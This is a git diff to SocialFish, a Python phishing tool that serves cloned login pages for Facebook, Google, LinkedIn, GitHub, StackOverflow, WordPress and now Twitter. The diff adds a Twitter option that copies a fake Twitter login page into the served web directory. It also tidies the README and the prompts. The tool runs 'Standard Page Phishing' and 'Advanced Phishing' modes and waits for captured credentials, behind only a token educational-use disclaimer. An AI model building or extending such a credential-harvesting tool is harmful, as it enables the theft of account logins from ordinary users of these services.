diff --git a/README.md b/README.md index b407942..538e026 100644 --- a/README.md +++ b/README.md @@ -54,8 +54,8 @@ python SocialFish.py - Traditional Google login page. - Advanced login with Facebook. -**+ LinkedIN:** -- Traditional LinkedIN login page. +**+ LinkedIn:** +- Traditional LinkedIn login page. **+ Github:** - Traditional Github login page. @@ -66,6 +66,9 @@ python SocialFish.py **+ Wordpress:** - Similar Wordpress login page. +**+ Twitter:** +- Traditional Twitter login page. + **PULL REQUESTS ARE WELCOME** ### SCREENSHOT @@ -73,10 +76,10 @@ python SocialFish.py ## DISCLAIMER
- JUST USE TO EDUCATIONAL PURPOSES + TO BE USED FOR EDUCATIONAL PURPOSES ONLY
-The use of the SocialFish is COMPLETE RESPONSIBILITY of the END-USER. Developer assume NO liability and are NOT responsible for any misuse or damage caused by this program. +The use of the SocialFish is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL diff --git a/SocialFish.py b/SocialFish.py index aeb27e6..0003752 100644 --- a/SocialFish.py +++ b/SocialFish.py @@ -71,7 +71,7 @@ def loadModule(module): `=.____.=" `._\\ - [{1}*{0}]{1} %s module loaded.{0}'''.format(CYAN, END) % module + [{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, END) % module def runPhishing(social, option2): system('sudo rm -Rf Server/www/*.* && touch Server/www/cat.txt') @@ -83,7 +83,7 @@ def runPhishing(social, option2): system('cp WebPages/google_standard/*.* Server/www/') elif option2 == '2' and social == 'Google': system('cp WebPages/google_advanced_poll/*.* Server/www/') - elif social == 'LinkedIN': + elif social == 'LinkedIn': system('cp WebPages/linkedin/*.* Server/www/') elif social == 'Github': system('cp WebPages/github/*.* Server/www/') @@ -91,6 +91,8 @@ def runPhishing(social, option2): system('cp WebPages/stackoverflow/*.* Server/www/') elif social == 'WordPress': system('cp WebPages/wordpress/*.* Server/www/') + elif social == 'Twitter': + system('cp WebPages/twitter/*.* Server/www/') def waitCreds(): print " {0}[{1}*{0}]{1} Waiting for credentials... \n".format(GREEN, END) @@ -135,11 +137,11 @@ def runPEnv(): else: print " --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again. http://www.php.net/".format(RED, END) exit(0) - if raw_input(" {0}[{1}!{0}]{1} Do you will use this tool only for educational purposes? (y/n)\n {2}SF > {1}".format(RED, END, CYAN)).upper() == 'N': + if raw_input(" {0}[{1}!{0}]{1} Do you agree to use this tool for educational purposes only? (y/n)\n {2}SF > {1}".format(RED, END, CYAN)).upper() == 'N': system('clear') print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL{1} ]\n'.format(RED, END) exit(0) - option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIN\n\n {0}[{1}4{0}]{1} Github\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}SF > {1}".format(CYAN, END)) + option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} Github\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}SF > {1}".format(CYAN, END)) if option == '1': loadModule('Facebook') option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END)) @@ -149,9 +151,9 @@ def runPEnv(): option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END)) runPhishing('Google', option2) elif option == '3': - loadModule('LinkedIN') + loadModule('LinkedIn') option2 = '' - runPhishing('LinkedIN', option2) + runPhishing('LinkedIn', option2) elif option == '4': loadModule('Github') option2 = '' @@ -164,6 +166,10 @@ def runPEnv(): loadModule('WordPress') option2 = '' runPhishing('WordPress', option2) + elif option == '7': + loadModule('Twitter') + option2 = '' + runPhishing('Twitter', option2) else: exit(0) diff --git a/WebPages/fb_advanced_poll/index.html b/WebPages/fb_advanced_poll/index.html index 74e5e48..794e574 100644 --- a/WebPages/fb_advanced_poll/index.html +++ b/WebPages/fb_advanced_poll/index.html @@ -22,7 +22,7 @@+ New to Twitter? + Sign up now » +
++ Already using Twitter via text message? + Activate your account » +
++ You can add location information to your Tweets, such as your city or precise location, from the web and via third-party applications. You always have the option to delete your Tweet location history. + Learn more +
+